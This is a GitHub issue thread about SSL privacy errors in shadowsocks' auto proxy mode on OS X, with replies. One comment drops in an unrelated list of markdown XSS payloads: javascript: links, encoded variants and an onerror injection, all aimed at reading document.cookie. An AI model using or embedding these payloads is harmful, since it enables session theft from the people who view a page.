### ISSUE TITLE
Auto Proxy Mode SSL Error

### ISSUE THREAD

**Issue by liyaodong** [shadowsocks/shadowsocks-iOS#96]
OS X Version :

When I visit `https` website ，the browser will show `privacy error` .  I'm try to change my browser and change proxy host . the error still appear . But when I change Mode to `Globe Mode` everything is allright . How to fix this ? Thank you !

TS: 我访问`https`加密网站的时候就出现SSL错误，不管换浏览器还是换代理服务器都不管用。但是我切换成全局代理模式就好了，难道是PAC错误吗？还是SSL劫持之类的？求各位知情人士解答，谢谢！

**Comment by 0xr0ot** [comment]
[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>  
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)

**Comment by thinkevd** [comment]
也关注这个问题，evernote和twitter都出现。
